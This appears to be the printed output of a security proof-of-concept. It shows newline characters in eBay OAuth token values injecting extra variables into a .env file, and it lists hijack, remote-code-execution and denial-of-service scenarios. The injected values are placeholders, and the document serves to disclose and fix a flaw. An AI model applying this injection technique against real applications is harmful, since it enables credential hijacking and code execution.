=== Initial .env file ===
EBAY_APP_ID=test_app
EBAY_CERT_ID=test_cert
EBAY_REDIRECT_URI=https://example.com/callback

=== Injecting malicious tokens ===
Access token contains: "v1.MTIzNDU2Nzg5MA==\nATTACK_VAR=malicious_value_injected"
Refresh token contains: "v1.AbCdEfGhIjKl\nSECOND_ATTACK=second_payload"

=== Resulting .env file after injection ===
EBAY_APP_ID=test_app
EBAY_CERT_ID=test_cert
EBAY_REDIRECT_URI=https://example.com/callback

EBAY_USER_ACCESS_TOKEN="v1.MTIzNDU2Nzg5MA==
ATTACK_VAR=malicious_value_injected"
EBAY_USER_REFRESH_TOKEN="v1.AbCdEfGhIjKl
SECOND_ATTACK=second_payload"
=== Vulnerability Analysis ===
❌ VULNERABILITY CONFIRMED: Environment variable injection successful!
Injected variables:
  - ATTACK_VAR=malicious_value_injected"
  - SECOND_ATTACK=second_payload"

Attack scenario:
- Attacker can overwrite EBAY_REDIRECT_URI to hijack OAuth flow
- Attacker can set NODE_OPTIONS for potential RCE
- Attacker can corrupt configuration causing DoS